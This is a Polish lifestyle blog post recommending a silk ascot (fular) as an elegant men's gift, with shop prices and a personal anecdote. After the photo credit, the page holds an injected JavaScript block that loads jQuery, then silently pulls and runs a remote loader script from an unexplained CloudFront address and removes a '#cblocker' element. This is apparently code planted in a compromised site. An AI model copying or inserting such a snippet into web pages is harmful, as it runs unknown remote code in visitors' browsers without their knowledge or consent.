Prezentuję kolejny oryginalny element męskiej garderoby

13 marca 2012
zamiast krawata i muszki

Po tak długiej serii prezentów dla kobiet, dziś naprawdę najwyższa już pora na prezent męski. W zakresie prezentów męskich tak się jakoś złożyło, że w kategorii ubrania i dodatki dzielą się one na dwa rodzaje – dla elegantów i dla podróżników. Etykietka ‘dla podróżników’ funkcjonuje prawie od początku działalności bloga, ale najwyższa pora dodać także kategorię ‘dla dżentelmena’, bo po spinkach do mankietów, szelkach i poszetce, dziś chciałabym zaprezentować Wam kolejny oryginalny element męskiej garderoby.

Jakiś czas temu, na początku karnawału wybrałam się na imprezę, na której jeden mężczyzna, znany mi od kilku ładnych lat i nie grzeszący przesadną urodą, wystąpił w takim stroju, że zachwycały się nim wszystkie kobiety, nawet największe elegantki. Oczywiście miał ładną, dobrze wyprasowaną koszulę, odpowiednio dobraną marynarkę, ale przede wszystkim wrażenie robił zawiązany wokół szyi fular. I pomyśleć, że wpisując hasło ‘fular’ do wikipedii dowiecie się, że jest to dodatek obecnie uważany za zbyt wyszukany. Absolutnie się z tym nie zgadzam!


Kiedy zatem w ubiegłym tygodniu zobaczyłam kolejnego mężczyznę w fularze (i słowo honoru nie jestem Wam w stanie nic o nim powiedzieć ponad to, że także wyglądał w nim świetnie), stwierdziłam, że to najwyższa pora, aby opisać ten element męskiej garderoby. Fular to rodzaj chusteczki zawiązywanej przez mężczyzn zamiast krawata do mniej oficjalnego stroju, ale tworzący niesamowicie eleganckie wrażenie. Więcej na temat tego dodatku możecie przeczytać na blogu Szarmanta. Dostępne są oczywiście fulary z różnych materiałów, choć klasycznie powinny być jedwabne, a także w rozmaitych wzorach. Osobiście, gdybym miała wybrać fular dla Pana M. wybrałabym jeden z tych.  

Fular jedwabny – cena: 99 zł, www.poszetka.com

Fular jedwabny – cena: 99 zł, www.poszetka.com

I wcale nie wykluczone, że jeden z nich ode mnie dostanie, bo naprawdę inni mężczyźni tak elegancko prezentowali się w stylizacjach z fularami, że bardzo chciałabym zobaczyć Pana M. w stroju z takim dodatkiem! A czy Wy chciałybyście aby Wasi mężczyźni je nosili?


P.S. Zdjęcia pochodzą ze strony http://www.poszetka.com/

if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220&zoneid=14731&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Kategoria: , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję sposób na domowe spa

Następny

Prezentuję wpis sprzed tygodnia

Comments are closed here.